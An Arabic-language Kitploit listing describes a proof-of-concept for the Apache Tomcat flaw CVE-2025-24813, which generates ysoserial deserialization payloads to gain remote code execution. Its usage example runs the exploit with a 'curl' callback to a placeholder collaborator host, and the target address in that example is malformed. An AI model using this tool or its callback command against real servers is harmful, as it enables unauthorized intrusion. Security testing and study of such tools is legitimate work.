Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/tonyarris/cve-2025-24813-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubtonyarris/cve-2025-24813-poc

CVE-2025-24813-PoC

إثبات مفهوم لـ CVE-2025-24813

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-24813-PoC

تؤثر CVE-2025-24813 على Apache Tomcat - إذا كان الإصدار هشًا وتم ضبط إعداداته بشكل سيئ للغاية، يمكن للمهاجم الحصول على RCE من خلال طلب GET واحد وطلب POST واحد.

مزيد من المعلومات هنا

هذا هو سكربت Yiheng An وJun Li وQiang Liu وHaozhe Zhang وQi Deng من الكتابة الفنية الأخيرة، وقد تم تعديله لقبول أمر، وتوليد جميع حمولات ysoserial gadget، وإرسالها إلى هدفك.

تمت المشاركة في سبيل الاختبار الأمني الأخلاقي.

مثال الاستخدام:

root@kitploit:~
python3 exploit.py --command 'curl http://yourcollaburl' --target 'http://192.168.10.0.1:8080' --proxy '127.0.0.1:8080'

يُظهر poc.mp4 السكربت أثناء العمل، حيث يولّد الحمولات ويرسلها إلى الهدف، وفي اللوحة اليمنى نرى مستمع interact يتم استدعاؤه.

تنزيل الأداة